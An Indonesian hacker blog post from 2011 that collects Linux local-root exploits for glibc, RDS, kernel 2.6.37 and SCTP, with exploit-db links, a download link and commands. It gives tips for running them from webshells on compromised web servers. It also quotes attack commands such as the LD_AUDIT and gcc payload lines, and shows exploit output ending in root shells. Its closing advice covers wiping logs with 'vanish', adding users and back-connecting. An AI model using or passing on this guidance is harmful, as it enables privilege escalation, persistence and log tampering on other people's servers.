Ekiosku.com jual beli online aman menyenangkan

Exploit Local Root

Exploit Local Root
31 JANUARY 2011 AT 4:46AM BY C4UR


                     ###################################################
                     #                                                 #
                     #    ,--^----------,--------,-----,-------^--,    #
                     #   | |||||||||   `--------'     |          O     #
                     #   `+---------------------------^----------|     #
                     #     `\_,-------, _________________________|     #
                     #       / XXXXXX /`|     /                        #
                     #      / XXXXXX /  `\   /                         #
                     #     / XXXXXX /\______(                          #
                     #    / XXXXXX /                                   #
                     #   / XXXXXX /          cucunya kongSANUN ^_^     #
                     #  (________(                 BY c4uR             #
                     #   `------'             qinoryy@yahoo.com        #
                     #                                                 #
                     ###################################################


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
GNU C library dynamic linker $ORIGIN expansion Vulnerability
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Tavis Ormandy
http://www.exploit-db.com/exploits/15274/
2.12.1, FC13 <=== fedora
2.5, RHEL5 / CentOS5
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15274-thumb.png


untuk xpl ini, langkah awal yg harus kita lakukan adalah
cek kesedian "gcc dan ln /bin/ping <===== via command webshell"
jika gcc dan ln /bin/ping nya sukses
maka w00t 85%

biasanya(jika gagal) mentok di bagian ini "gcc -w -fPIC -shared -o /tmp/exploit payload.c"
dan ini "LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3"

klo gw biasanya
klo mo eksekusi, make xpl ini
gw ubah direktorynya
defaulnya /tmp/exploit
misal, /home/user/public_html/shell
jadinya seperti ini, /home/user/public_html/shell/exploit
dan seterusnya
klo gw, biasanya make *.c(payload.c)nya dr shell


gambar ini menunjukan, xpl ini w00t 100%
http://oi51.tinypic.com/r1nbk3.jpg
http://oi54.tinypic.com/9b9kp0.jpg

gambar ini menunjukan, xpl ini w00t 95%
http://oi56.tinypic.com/2gy3720.jpg

gambar ini menunjukan, gatot =))
http://oi56.tinypic.com/2mn3wi8.jpg

fedora 32
http://oi54.tinypic.com/4sz2ud.jpg

mudah dan pahamkan :D
oh iyah, pk xpl ini gg w00t http://www.exploit-db.com/exploits/15024/(2618)
gambar² ntu :P


gw sih biasanya klo mo cek ap² di command webshell ajah

bentuk videonya
http://www.youtube.com/watch?v=BENgdFhON7w

Download xpl : http://islamiccenteremporia.org/.../xpl/xpl.tgz
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
Linux RDS Protocol Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15285/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15285.png

xpl 263x32 dan 263x64

w00t test on fedora,openSUSE dan ubuntu

fedora
http://oi52.tinypic.com/aphap0.jpg

ubuntu
http://oi54.tinypic.com/slk037.jpg

openSUSE
http://oi52.tinypic.com/opn5f8.jpg


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
  GNU C library dynamic linker LD_AUDIT arbitrary DSO load Vulnerability
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Tavis Ormandy
http://www.exploit-db.com/exploits/15304/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt15500/15304.png

    2.12.1, FC13
    2.5, RHEL5 / CentOS5
    2.11.1, Ubuntu 10


klo di xpl ini, namanya
dpkg32 dan dpkg64

untuk file *.c nya bisa di liat disini
http://forum.devilzc0de.org/thread-4453.html

klo mau coba yg manual
langkah awal yaitu
ktik d command webshell kalian
dpkg, jika dpkg ada maka w00t 70%

bisanya mentok disini
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

debian 32 bit
http://oi52.tinypic.com/91cay8.jpg

debian 64 bit
http://oi56.tinypic.com/110kqjp.jpg

buntu 32 bit
http://oi53.tinypic.com/2wr2ro1.jpg

blom pernah w00t
klo nyoba centOS dan fedora, ntu gw :P



▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
2.6.37 Local Privilege Escalation
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Author: Dan Rosenberg
http://www.exploit-db.com/exploits/15704/
http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt16000/
screen-shot-2010-12-07-at-72005-pm.png

masih anget ini xpl =))

test 32 bit
http://oi52.tinypic.com/35irwaw.jpg

64bitnya lom di test

xpl ini 2637x32 dan 2637x64

info
archives.neohapsis.com/archives/fulldisclosure/2010-12/0128.html


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
     CVE-2009-1046 Virtual Console UTF-8  set_selection() off-by-one(two) Memory Corruption
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

coded by: sgrakkyu <at> antifork.org
http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html

Tested on target:
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
Fedora Core 10 x86_64 (default installed kernel - without selinux)

./26x64
[**] Patching ring0 shellcode with userspace addr: 0x4017e0
[**] Using port: 25433
[**] Getting slab info...
[**] Mapping Segments...
[**] Trying mapping safe page...Page Protection Present (Unable to Map Safe Page)
[**] Mapping High Address Page (don't kill placeholder child)
[**] Mapping Code Page... Done
[**] Binding on CPU 0
[**] Start Server Thread..
...
...
...
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼┼
[**] Umapped end-to-end fd: 212
[**] Unsafe fd: ( 210 224 214 212 )
[**] Hijacking fops...
[**] Migrate evil unsafe fds to child process..
[**] Child process 25463 _MUST_ NOT die..keep it alive:)
[**] Got root!
# id
uid=0(root) gid=0(root) groups=1001(anon)


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
CVE-2009-0065 Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

coded by: sgrakkyu <at> antifork.org
http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html

NOTE: you need at least one sctp application bound on the target box

Supported target:
Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
Fedora Core 10 x86_64 (default installed kernel)
OpenSuse 11.1 x86_64  (default installed kernel)

./26sctp64 -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache...
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)...
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ......
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute...
[**] ....
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()...
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0


▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

xpl ros132
http://oi56.tinypic.com/35i20bb.jpg

xpl 2618
http://www.youtube.com/watch?v=8bWUIQ55Wdw

xpl 263xxx64
http://www.youtube.com/watch?v=oct7p5hKdfU

xpl spender
http://www.youtube.com/watch?v=jQ-3yIwTmug
http://oi51.tinypic.com/334jbm0.jpg

chechk.sh
http://oi55.tinypic.com/fxcsh3.jpg

sock64
http://oi54.tinypic.com/2qk5qb5.jpg

sock32
http://oi51.tinypic.com/4ujrr7.jpg

redhat32
http://oi51.tinypic.com/21ca1k8.jpg
poc = securityfocus.com/archive/1/326337


▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▌
▌ bisakan klo abis ngelocal gunakan
▌ vanish. basic bg gw 40% logica 60%.
▌ jagn pernah install sshdoor(sarangw)
▌ adduser bisa ajah udah cukup.
▌ semua xpl ini dah d uji cb
▌ tergantung kalian yg menjalaknnya.
▌ sblom d bind atw d bek-konak
▌ run dulu ajah xplnya d command webshell
▌ nanti juga tau sndiri
▌ sgini ajah dolo dan xpl ini akan update
▌ trus
▌ di mulailah dr versi yg rendah dulu
▌ apapun itu jenisnya

 

Copyright © 2011 by Tutorial SEO - All Rights Reserved

Template by Blogger Templates | Powered by Blogger